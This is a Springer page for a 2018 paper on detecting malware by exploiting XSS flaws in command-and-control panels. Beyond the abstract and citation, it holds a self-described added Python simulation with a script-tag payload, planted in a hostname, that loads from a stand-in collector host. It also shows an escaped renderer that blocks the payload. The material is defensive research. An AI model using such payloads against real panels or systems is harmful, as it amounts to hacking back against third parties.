Detection in the Dark – Exploiting XSS Vulnerability in C&C Panels to Detect Malwares

  • Conference paper
  • In: Cyber Security Cryptography and Machine Learning (CSCML 2018)

Part of the book series: Lecture Notes in Computer Science ((LNSC,volume 10879))

Abstract

Numerous defense techniques exist for preventing and detecting malware on endpoints (end stations and servers). Although these techniques are widely deployed on enterprise networks, many types of malware stay under the radar and execute their malicious actions time and again. A more creative and effective solution is therefore necessary, especially since classic threat detection techniques do not make use of every stage of the attack kill chain when attempting to detect malicious behavior on endpoints.

In this paper, we propose a novel approach to malware detection. It combines offensive and defensive techniques to detect active malware attacks: vulnerabilities in the malware's command and control (C&C) panels are exploited by manipulating significant values in the operating systems of endpoints, so that the trusted communication channel between an infected machine and its panel carries the attack against the panel.
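The mechanism the abstract describes, as a constructed Python simulation added here (not code from the paper or from any real C&C panel): the defender plants a beacon payload in an endpoint value that bots commonly harvest and report (here the hostname), the bot ships it in its check-in, and a panel that echoes the field without output encoding hands the payload to the operator's browser, which then calls back to the defender's collector. The collector URL, the field names and the check-in encoding are assumptions; the hardened renderer shows the output-encoding check that would close the hole.

```python
"""
Constructed simulation of the detection idea: a planted endpoint value that
rides a bot's own check-in into the C&C panel and fires in the operator's
browser. Nothing here is taken from the paper or from a real panel; the
collector URL, field names and check-in encoding are assumptions.
"""
import html
import re
from urllib.parse import parse_qsl, urlencode

# Defender-controlled endpoint that records the beacon (assumed URL).
COLLECTOR = "https://detector.example.test/beacon"

# Payload planted in the endpoint value; a real deployment would tag it with
# an identifier so the collector knows which infected machine surfaced it.
BEACON_PAYLOAD = f'<script src="{COLLECTOR}?m=bot-0001"></script>'

# Matches a live <script> tag; the HTML-escaped form "&lt;script" does not match.
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def stage_endpoint_identity(machine_id: str) -> dict:
    """Values a bot typically harvests from the OS and reports to its panel.
    The hostname is the 'significant value' the defender has manipulated."""
    return {
        "id": machine_id,
        "hostname": BEACON_PAYLOAD,
        "user": "svc_backup",
        "os": "Windows 10",
    }


def build_checkin(fields: dict) -> str:
    """Encode the check-in the way a simple HTTP bot would POST it."""
    return urlencode(fields)


def parse_checkin(body: str) -> dict:
    """Panel-side decoding of the POST body; URL-decoding restores the raw tag."""
    return dict(parse_qsl(body))


def render_bot_row(fields: dict, escape_output: bool) -> str:
    """Render one row of the panel's bot list.

    escape_output=False reproduces the unsanitised output of an XSS-vulnerable
    panel; escape_output=True applies the output encoding (html.escape, the
    equivalent of PHP's htmlentities) that a hardened panel must use.
    """
    enc = html.escape if escape_output else (lambda s: s)
    cells = "".join(f"<td>{enc(fields[k])}</td>" for k in ("id", "hostname", "user", "os"))
    return f"<tr>{cells}</tr>"


def beacon_would_fire(rendered_html: str) -> bool:
    """Proxy for 'the operator's browser would load the collector URL':
    an unescaped script tag that references the collector survived rendering."""
    return bool(SCRIPT_TAG.search(rendered_html)) and COLLECTOR in rendered_html


def simulate(escape_output: bool) -> bool:
    """Run the full path: plant value -> bot check-in -> panel render -> beacon?"""
    body = build_checkin(stage_endpoint_identity("bot-0001"))
    received = parse_checkin(body)
    return beacon_would_fire(render_bot_row(received, escape_output))


if __name__ == "__main__":
    print("vulnerable panel fires beacon:", simulate(escape_output=False))
    print("hardened panel fires beacon:  ", simulate(escape_output=True))
```

The signal only exists if the panel actually reflects the planted field and an operator opens the page that renders it; a panel that encodes its output, or stores the value without displaying it, yields nothing, so the planted field should be one the targeted family is known to display. Changing identifiers such as the hostname on production endpoints also affects other tooling, and causing script to run in a third party's browser raises the same legal questions as any other form of hacking back, so the choice of value and the decision to deploy need the same review as an active countermeasure.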



Author information


Correspondence to Shay Nachum , Assaf Schuster or Opher Etzion .


Copyright information

© 2018 Springer International Publishing AG, part of Springer Nature

About this paper


Cite this paper

Nachum, S., Schuster, A., Etzion, O. (2018). Detection in the Dark – Exploiting XSS Vulnerability in C&C Panels to Detect Malwares. In: Dinur, I., Dolev, S., Lodha, S. (eds) Cyber Security Cryptography and Machine Learning. CSCML 2018. Lecture Notes in Computer Science(), vol 10879. Springer, Cham. https://doi.org/10.1007/978-3-319-94147-9_18


  • DOI: https://doi.org/10.1007/978-3-319-94147-9_18


  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-319-94146-2

  • Online ISBN: 978-3-319-94147-9

  • eBook Packages: Computer Science; Computer Science (R0)
